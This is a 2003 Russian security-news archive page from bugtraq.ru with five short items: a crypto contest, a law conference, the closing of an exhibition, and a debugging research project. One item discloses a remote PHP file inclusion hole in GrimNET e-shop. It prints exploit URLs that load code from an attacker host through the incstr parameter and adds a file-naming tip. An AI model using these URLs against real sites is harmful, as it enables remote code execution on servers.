 |  |
https://bugtraq.ru/rsn/?page=394 |
|
|||
|
|
|
||
| https://bugtraq.ru/rsn/?page=394 |
||||
| ||||
Очередной криптоконкурс
dl // 22.10.03 19:21
Thawte Consulting объявила об очередном конкурсе на вскрытие зашифрованного текста, который начнется 27 октября.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/40.html]
Для решения поставленной задачи не потребуются значительные вычислительные ресурсы - по крайней мере, в предыдущих конкурсах использовались вариации на тему достаточно простых подстановочных шифров.
Победитель получит экземпляр книги Митника "The Art of Deception".
С предыдущими заданиями можно ознакомиться здесь.
|
Источник: LinuxWorld обсудить | все отзывы (0) |
V международная конференция "Право и Интернет: теория и практика"
dl // 21.10.03 18:13
25-26 ноября в Москве пройдет V международная конференция "Право и Интернет: теория и практика".
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/39.html]
Приглашаются все заинтересованные лица.
В рамках основной темы этого года "Проблемы интеллектуальной собственности в киберпространстве" предлагаются следующие направления работы:
- проблемы интеллектуальной собственности в Интернет;
- правовые аспекты информационной безопасности;
- электронный документооборот в гражданско-правовых, уголовно-правовых, публично-правовых отношениях.
Планируется проведение круглого стола по использованию кибертехнологий в юридическом образовании и круглого стола грантодателей.
Также доступен и сайт с материалами прошлогодней конференции.
|
Источник: сайт конференции теги: конференции | обсудить | все отзывы (0) |
Выставка Comtek прекращает свое существование
jammer // 21.10.03 12:35
На днях британская выставочная группа ITE, владеющая правом на проведение крупнейшей российской компьютерной выставки - Comtek, объявила, что выставка прекращает свое существование.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/38.html]
Маркетологи ITE пришли к выводу, что брэнд Comtek "себя дискредитировал", а потому вместо одноименного шоу решено проводить несколько небольших специализированных выставок под общим названием IT-Week.
|
Источник: rambler.ru обсудить | все отзывы (5) |
Выполнение произвольного PHP-кода в GrimNET e-shop
dl // 20.10.03 22:37
Не представляю, насколько актуальна эта самая корейская система электронных магазинов, но дырка любопытна и сама по себе.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/37.html]
Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.
|
Источник: NivaX, http://www.web-hack.ru теги: .net | обсудить | все отзывы (0) |
Отладку программ - в массы!
Ktirf // 20.10.03 19:58
В университетах Беркли и Стэнфорда разрабатывается проект, призванный улучшить снабжение разработчиков отладочной информацией.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/36.html]
Проект называется Cooperative Bug Isolation и движется дальше в направлении, намеченном инструментом Dr. Watson и talkback-сборками Мозиллы. Суть проекта состоит в использовании так называемых программ-сэмплеров. Введение сэмплера в разрабатываемый продукт, которое производится специально измененной для этого версией GCC, позволяет фиксировать прохождение определенных чекпойнтов прямо во время работы продукта у конечного пользователя (разумеется, пользователь должен согласиться на то, чтобы использовать такую вот "отладочную" версию продукта). На данный момент в качестве чекпойнтов выступают ветвления: сэмплер фиксирует, по какой ветке пошло выполнение программы. Поскольку запоминать все ветвления может быть весьма накладно, регистрация будет происходит эпизодически, по случайной выборке. Единственным безусловно фиксирующимся событием является нормальное или аномальное завершение программы.
Подобная технология была создана в надежде на то, что при достаточно большом числе успешных и неуспешных прогонов удастся определять точки, в которых программа делает первый "ложный шаг" и таким образом локализовать причину ошибки. Первые пять продуктов с внедренными сэмплерами уже готовы (это "Outlook для Linux" Evolution, графический редактор Gimp, интернет-пейджер Gaim, процессор электронных таблиц Gnumeric, музредактор RhythmBox и файловый менеджер Nautilus). Дело осталось за малым: найти достаточное количество добровольцев, которые бы согласились пользоваться экспериментальными сборками их любимых программ с целью помочь разработчикам. Впрочем, в мире OpenSource с добровольцами никогда не было особых проблем.
|
Источник: ZDNet.ru теги: linux, outlook | обсудить | все отзывы (5) |
«« « 391 | 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400  » »» |
|
|
|